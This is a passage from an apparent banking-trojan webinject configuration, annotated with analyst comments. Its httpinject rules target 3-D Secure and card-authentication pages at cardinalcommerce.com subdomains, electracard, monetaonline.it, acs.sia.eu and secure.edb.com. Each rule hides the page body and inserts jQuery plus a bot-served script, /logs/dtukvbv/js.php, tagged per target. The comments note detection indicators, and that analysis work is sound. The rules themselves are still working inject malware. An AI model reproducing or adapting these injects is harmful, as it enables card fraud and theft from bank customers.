  1230. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=3dsecure.no.acs4"></script>]]></replacement>
  1231. </modify>
  1232. </actions>
  1233. </httpinject>
  1234. <httpinject>
        <!-- Trigger: every URL on avantcard.cardinalcommerce.com under /transaction/ (allow
             regex, anchored at the start only and ending in .*; onget="1", onpost="1").
             Presumably a hosted card-authentication page; the URL alone does not confirm that.
             The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  1235. <conditions>
  1236. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://avantcard\.cardinalcommerce\.com/transaction/.*]]></url>
  1237. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1238. </url>
  1239. </conditions>
  1240. <actions>
  1241. <modify>
        <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=cardinalcommerce.avantcard. Indicators for triage:
             that path with botid/system parameters, and the visibility:hidden style right after
             the head tag. -->
  1242. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1243. <replacement><![CDATA[\1<style type="text/css">
  1244. body {visibility: hidden; }
  1245. </style>
  1246. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1247. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.avantcard"></script>]]></replacement>
  1248. </modify>
  1249. </actions>
  1250. </httpinject>
  1251. <httpinject>
        <!-- Trigger: every URL on ubi.electracard.com under /ubi/jsp/ (allow regex, anchored at
             the start only and ending in .*; onget="1", onpost="1"). Presumably a hosted
             card-authentication page; the URL alone does not confirm that. The deny entry
             (onget="1", onpost="0") lists static asset extensions. -->
  1252. <conditions>
  1253. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ubi\.electracard\.com/ubi/jsp/.*]]></url>
  1254. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1255. </url>
  1256. </conditions>
  1257. <actions>
  1258. <modify>
        <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
             case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
             jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
             /logs/dtukvbv/js.php with system=electracard.ubi. Indicators for triage: that path
             with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  1259. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1260. <replacement><![CDATA[\1<style type="text/css">
  1261. body {visibility: hidden; }
  1262. </style>
  1263. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1264. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.ubi"></script>]]></replacement>
  1265. </modify>
  1266. </actions>
  1267. </httpinject>
  1268. <httpinject>
        <!-- Analyst note: scoped to cbi.electracard.com/cbi/jsp/. Appends body-hiding CSS, jQuery 1.4.2 from
             ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php (system=electracard.cbi) after the
             opening head tag. The pattern flags msU look like PCRE flags (s: dot matches newline, U: ungreedy), which
             would limit the match to the opening head tag only; confirm against the bot's regex engine. -->
  1269. <conditions>
  1270. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cbi\.electracard\.com/cbi/jsp/.*]]></url>
  1271. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1272. </url>
  1273. </conditions>
  1274. <actions>
  1275. <modify>
  1276. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1277. <replacement><![CDATA[\1<style type="text/css">
  1278. body {visibility: hidden; }
  1279. </style>
  1280. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1281. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.cbi"></script>]]></replacement>
  1282. </modify>
  1283. </actions>
  1284. </httpinject>
  1285. <httpinject>
        <!-- Analyst note: scoped to sibacs.electrapay.com/SouthIndianBank/jsp/. Appends body-hiding CSS, jQuery 1.4.2
             from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php after the opening head tag.
             The system tag reads electracard.sibacs although the matched host is under electrapay.com, so searches
             built from this config should cover both names. -->
  1286. <conditions>
  1287. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sibacs\.electrapay\.com/SouthIndianBank/jsp/.*]]></url>
  1288. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1289. </url>
  1290. </conditions>
  1291. <actions>
  1292. <modify>
  1293. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1294. <replacement><![CDATA[\1<style type="text/css">
  1295. body {visibility: hidden; }
  1296. </style>
  1297. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1298. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.sibacs"></script>]]></replacement>
  1299. </modify>
  1300. </actions>
  1301. </httpinject>
  1302. <httpinject>
        <!-- Analyst note: scoped to every https URL on santanderpbvisa.cardinalcommerce.com (the pattern ends in /.*,
             with no path restriction). Appends body-hiding CSS, jQuery 1.4.2 from ajax.googleapis.com and the
             host-relative script /logs/dtukvbv/js.php tagged system=cardinalcommerce.santanderpbvisa after the
             opening head tag. -->
  1303. <conditions>
  1304. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://santanderpbvisa\.cardinalcommerce\.com/.*]]></url>
  1305. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1306. </url>
  1307. </conditions>
  1308. <actions>
  1309. <modify>
  1310. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1311. <replacement><![CDATA[\1<style type="text/css">
  1312. body {visibility: hidden; }
  1313. </style>
  1314. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1315. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.santanderpbvisa"></script>]]></replacement>
  1316. </modify>
  1317. </actions>
  1318. </httpinject>
  1319. <httpinject>
        <!-- Analyst note: scoped to every https URL on santanderpbmc.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.santanderpbmc after the opening head tag. The deny rule carries onpost=0, so it
             presumably exempts only GET requests for static files; POST responses would still be eligible. -->
  1320. <conditions>
  1321. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://santanderpbmc\.cardinalcommerce\.com/.*]]></url>
  1322. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1323. </url>
  1324. </conditions>
  1325. <actions>
  1326. <modify>
  1327. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1328. <replacement><![CDATA[\1<style type="text/css">
  1329. body {visibility: hidden; }
  1330. </style>
  1331. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1332. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.santanderpbmc"></script>]]></replacement>
  1333. </modify>
  1334. </actions>
  1335. </httpinject>
  1336. <httpinject>
        <!-- Analyst note: scoped to every https URL on thinkmoney.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.thinkmoney after the opening head tag. Because the body starts hidden, a page
             that stays blank or renders late may be the only symptom the cardholder notices. -->
  1337. <conditions>
  1338. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://thinkmoney\.cardinalcommerce\.com/.*]]></url>
  1339. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1340. </url>
  1341. </conditions>
  1342. <actions>
  1343. <modify>
  1344. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1345. <replacement><![CDATA[\1<style type="text/css">
  1346. body {visibility: hidden; }
  1347. </style>
  1348. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1349. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.thinkmoney"></script>]]></replacement>
  1350. </modify>
  1351. </actions>
  1352. </httpinject>
  1353. <httpinject>
        <!-- Analyst note: scoped to kfh-b.cardinalcommerce.com/transaction/. Appends body-hiding CSS, jQuery 1.4.2
             from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.kfh-b after the opening head tag. The jQuery include points at a legitimate
             public CDN and is not an indicator on its own; pair it with the js.php path when writing detections. -->
  1354. <conditions>
  1355. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://kfh-b\.cardinalcommerce\.com/transaction/.*]]></url>
  1356. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1357. </url>
  1358. </conditions>
  1359. <actions>
  1360. <modify>
  1361. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1362. <replacement><![CDATA[\1<style type="text/css">
  1363. body {visibility: hidden; }
  1364. </style>
  1365. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1366. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.kfh-b"></script>]]></replacement>
  1367. </modify>
  1368. </actions>
  1369. </httpinject>
  1370. <httpinject>
        <!-- Analyst note: scoped to every https URL on ibqmc.cardinalcommerce.com. Appends body-hiding CSS, jQuery
             1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.ibqmc after the opening head tag. The script src has no host part, so the request
             would appear to target this host; presumably the bot answers it (not shown in this config). -->
  1371. <conditions>
  1372. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ibqmc\.cardinalcommerce\.com/.*]]></url>
  1373. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1374. </url>
  1375. </conditions>
  1376. <actions>
  1377. <modify>
  1378. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1379. <replacement><![CDATA[\1<style type="text/css">
  1380. body {visibility: hidden; }
  1381. </style>
  1382. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1383. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ibqmc"></script>]]></replacement>
  1384. </modify>
  1385. </actions>
  1386. </httpinject>
  1387. <httpinject>
        <!-- Analyst note: scoped to stanbicibtcbankweb.cardinalcommerce.com/transaction/. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.stanbicibtcbankweb after the opening head tag. The query also carries type=js;
             what other type values exist cannot be told from this rule. -->
  1388. <conditions>
  1389. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://stanbicibtcbankweb\.cardinalcommerce\.com/transaction/.*]]></url>
  1390. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1391. </url>
  1392. </conditions>
  1393. <actions>
  1394. <modify>
  1395. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1396. <replacement><![CDATA[\1<style type="text/css">
  1397. body {visibility: hidden; }
  1398. </style>
  1399. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1400. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.stanbicibtcbankweb"></script>]]></replacement>
  1401. </modify>
  1402. </actions>
  1403. </httpinject>
  1404. <httpinject>
        <!-- Analyst note: scoped to every https URL on eurobankvisa.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.eurobankvisa after the opening head tag. The system value is the only part that
             differs from the sibling /logs/dtukvbv/js.php rules, so it presumably selects the per-target script. -->
  1405. <conditions>
  1406. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://eurobankvisa\.cardinalcommerce\.com/.*]]></url>
  1407. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1408. </url>
  1409. </conditions>
  1410. <actions>
  1411. <modify>
  1412. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1413. <replacement><![CDATA[\1<style type="text/css">
  1414. body {visibility: hidden; }
  1415. </style>
  1416. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1417. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.eurobankvisa"></script>]]></replacement>
  1418. </modify>
  1419. </actions>
  1420. </httpinject>
  1421. <httpinject>
        <!-- Analyst note: scoped to every https URL on ibqvisa.cardinalcommerce.com. Appends body-hiding CSS, jQuery
             1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.ibqvisa after the opening head tag. A request for /logs/dtukvbv/js.php on this
             host is the indicator to look for; the legitimate site is not expected to serve that path (TODO verify). -->
  1422. <conditions>
  1423. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ibqvisa\.cardinalcommerce\.com/.*]]></url>
  1424. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1425. </url>
  1426. </conditions>
  1427. <actions>
  1428. <modify>
  1429. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1430. <replacement><![CDATA[\1<style type="text/css">
  1431. body {visibility: hidden; }
  1432. </style>
  1433. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1434. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ibqvisa"></script>]]></replacement>
  1435. </modify>
  1436. </actions>
  1437. </httpinject>
  1438. <httpinject>
        <!-- Analyst note: scoped to ubagroup.cardinalcommerce.com/transaction/. Appends body-hiding CSS, jQuery 1.4.2
             from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.ubagroup after the opening head tag. Both onget and onpost are 1 on the allow
             rule, so the rule presumably applies to responses for either request method. -->
  1439. <conditions>
  1440. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ubagroup\.cardinalcommerce\.com/transaction/.*]]></url>
  1441. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1442. </url>
  1443. </conditions>
  1444. <actions>
  1445. <modify>
  1446. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1447. <replacement><![CDATA[\1<style type="text/css">
  1448. body {visibility: hidden; }
  1449. </style>
  1450. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1451. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ubagroup"></script>]]></replacement>
  1452. </modify>
  1453. </actions>
  1454. </httpinject>
  1455. <httpinject>
        <!-- Analyst note: scoped to every https URL on sambabankmc.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.sambabankmc after the opening head tag. The config also holds a separate rule
             with the sambabankvisa tag, so the two card brands are tracked as distinct targets. -->
  1456. <conditions>
  1457. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sambabankmc\.cardinalcommerce\.com/.*]]></url>
  1458. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1459. </url>
  1460. </conditions>
  1461. <actions>
  1462. <modify>
  1463. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1464. <replacement><![CDATA[\1<style type="text/css">
  1465. body {visibility: hidden; }
  1466. </style>
  1467. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1468. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.sambabankmc"></script>]]></replacement>
  1469. </modify>
  1470. </actions>
  1471. </httpinject>
  1472. <httpinject>
        <!-- Analyst note: scoped to every https URL on eurobankmc.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.eurobankmc after the opening head tag. The replacement starts with \1, so the
             page's own head tag is kept and the added markup follows it. -->
  1473. <conditions>
  1474. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://eurobankmc\.cardinalcommerce\.com/.*]]></url>
  1475. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1476. </url>
  1477. </conditions>
  1478. <actions>
  1479. <modify>
  1480. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1481. <replacement><![CDATA[\1<style type="text/css">
  1482. body {visibility: hidden; }
  1483. </style>
  1484. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1485. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.eurobankmc"></script>]]></replacement>
  1486. </modify>
  1487. </actions>
  1488. </httpinject>
  1489. <httpinject>
        <!-- Analyst note: scoped to every https URL on savcreditmc.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.savcreditmc after the opening head tag. The directory name dtukvbv recurs in the
             js.php rules of this config and may be specific to this campaign or build; treat it as an indicator that
             can change between configs. -->
  1490. <conditions>
  1491. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://savcreditmc\.cardinalcommerce\.com/.*]]></url>
  1492. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1493. </url>
  1494. </conditions>
  1495. <actions>
  1496. <modify>
  1497. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1498. <replacement><![CDATA[\1<style type="text/css">
  1499. body {visibility: hidden; }
  1500. </style>
  1501. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1502. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.savcreditmc"></script>]]></replacement>
  1503. </modify>
  1504. </actions>
  1505. </httpinject>
  1506. <httpinject>
        <!-- Analyst note: scoped to every https URL on savcreditvisa.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.savcreditvisa after the opening head tag. The rule changes only the response
             seen in the infected browser; server-side logs of the real site would not show the added markup. -->
  1507. <conditions>
  1508. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://savcreditvisa\.cardinalcommerce\.com/.*]]></url>
  1509. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1510. </url>
  1511. </conditions>
  1512. <actions>
  1513. <modify>
  1514. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1515. <replacement><![CDATA[\1<style type="text/css">
  1516. body {visibility: hidden; }
  1517. </style>
  1518. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1519. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.savcreditvisa"></script>]]></replacement>
  1520. </modify>
  1521. </actions>
  1522. </httpinject>
  1523. <httpinject>
        <!-- Analyst note: scoped to every https URL on sambabankvisa.cardinalcommerce.com. Appends body-hiding CSS,
             jQuery 1.4.2 from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.sambabankvisa after the opening head tag. jQuery 1.4.2 is an old release; a page
             that loads it next to a newer jQuery of its own is a secondary sign of tampering. -->
  1524. <conditions>
  1525. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sambabankvisa\.cardinalcommerce\.com/.*]]></url>
  1526. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1527. </url>
  1528. </conditions>
  1529. <actions>
  1530. <modify>
  1531. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1532. <replacement><![CDATA[\1<style type="text/css">
  1533. body {visibility: hidden; }
  1534. </style>
  1535. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1536. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.sambabankvisa"></script>]]></replacement>
  1537. </modify>
  1538. </actions>
  1539. </httpinject>
  1540. <httpinject>
        <!-- Analyst note: scoped to alphabank.cardinalcommerce.com/transaction/. Appends body-hiding CSS, jQuery 1.4.2
             from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.alphabank after the opening head tag. Only URLs under /transaction/ match here,
             unlike the sibling rules whose pattern covers a whole host. -->
  1541. <conditions>
  1542. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://alphabank\.cardinalcommerce\.com/transaction/.*]]></url>
  1543. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1544. </url>
  1545. </conditions>
  1546. <actions>
  1547. <modify>
  1548. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1549. <replacement><![CDATA[\1<style type="text/css">
  1550. body {visibility: hidden; }
  1551. </style>
  1552. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1553. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.alphabank"></script>]]></replacement>
  1554. </modify>
  1555. </actions>
  1556. </httpinject>
  1557. <httpinject>
        <!-- Analyst note: scoped to marfinbank.cardinalcommerce.com/transaction/. Appends body-hiding CSS, jQuery 1.4.2
             from ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged
             system=cardinalcommerce.marfinbank after the opening head tag. The rule itself holds no form-handling
             logic; whatever the inject does with the page lives in the fetched script, which this dump does not
             include. -->
  1558. <conditions>
  1559. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://marfinbank\.cardinalcommerce\.com/transaction/.*]]></url>
  1560. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1561. </url>
  1562. </conditions>
  1563. <actions>
  1564. <modify>
  1565. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1566. <replacement><![CDATA[\1<style type="text/css">
  1567. body {visibility: hidden; }
  1568. </style>
  1569. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1570. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.marfinbank"></script>]]></replacement>
  1571. </modify>
  1572. </actions>
  1573. </httpinject>
  1574. <httpinject>
        <!-- Analyst note: scoped to www.monetaonline.it/acs/insertPassword with brand=MasterCard as the first query
             parameter. Appends body-hiding CSS, jQuery 1.4.2 from ajax.googleapis.com and the host-relative script
             /logs/dtukvbv/js.php tagged system=monetaonline.mc after the opening head tag. The path name suggests a
             password entry step of a card-authentication flow (inferred from the URL only). -->
  1575. <conditions>
  1576. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.monetaonline\.it/acs/insertPassword\?brand\=MasterCard.*]]></url>
  1577. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1578. </url>
  1579. </conditions>
  1580. <actions>
  1581. <modify>
  1582. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1583. <replacement><![CDATA[\1<style type="text/css">
  1584. body {visibility: hidden; }
  1585. </style>
  1586. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1587. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=monetaonline.mc"></script>]]></replacement>
  1588. </modify>
  1589. </actions>
  1590. </httpinject>
  1591. <httpinject>
        <!-- Analyst note: scoped to www.monetaonline.it/acs/insertPassword with brand=Visa as the first query
             parameter. Appends body-hiding CSS, jQuery 1.4.2 from ajax.googleapis.com and the host-relative script
             /logs/dtukvbv/js.php tagged system=monetaonline.visa after the opening head tag. The match depends on
             the query string order; a request with the parameters in another order would not match this pattern. -->
  1592. <conditions>
  1593. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.monetaonline\.it/acs/insertPassword\?brand\=Visa.*]]></url>
  1594. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1595. </url>
  1596. </conditions>
  1597. <actions>
  1598. <modify>
  1599. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1600. <replacement><![CDATA[\1<style type="text/css">
  1601. body {visibility: hidden; }
  1602. </style>
  1603. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1604. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=monetaonline.visa"></script>]]></replacement>
  1605. </modify>
  1606. </actions>
  1607. </httpinject>
  1608. <httpinject>
        <!-- Analyst note: scoped to acs.sia.eu/cartasi/pareq/. Appends body-hiding CSS, jQuery 1.4.2 from
             ajax.googleapis.com and the host-relative script /logs/dtukvbv/js.php tagged system=sia after the opening
             head tag. The acs host name and pareq path segment suggest a 3-D Secure authentication page (inferred
             from the URL only). -->
  1609. <conditions>
  1610. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.sia\.eu/cartasi/pareq/.*]]></url>
  1611. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1612. </url>
  1613. </conditions>
  1614. <actions>
  1615. <modify>
  1616. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1617. <replacement><![CDATA[\1<style type="text/css">
  1618. body {visibility: hidden; }
  1619. </style>
  1620. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1621. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sia"></script>]]></replacement>
  1622. </modify>
  1623. </actions>
  1624. </httpinject>
  1625. <httpinject>
        <!-- Analyst note: scoped to secure.edb.com/d3SecureAuthce2/d3Secure/authentication/post and anything after it.
             Appends body-hiding CSS, jQuery 1.4.2 from ajax.googleapis.com and the host-relative script
             /logs/dtukvbv/js.php tagged system=edb after the opening head tag. This is the last rule in the visible
             run that uses the /logs/dtukvbv/js.php loader; the rules that follow load other script names. -->
  1626. <conditions>
  1627. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure\.edb\.com/d3SecureAuthce2/d3Secure/authentication/post.*]]></url>
  1628. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1629. </url>
  1630. </conditions>
  1631. <actions>
  1632. <modify>
  1633. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1634. <replacement><![CDATA[\1<style type="text/css">
  1635. body {visibility: hidden; }
  1636. </style>
  1637. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1638. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=edb"></script>]]></replacement>
  1639. </modify>
  1640. </actions>
  1641. </httpinject>
  1642. <httpinject>
        <!-- Analyst note: the allow pattern starts with ^https\://.* before personal.co-operativebank.co.uk, so it
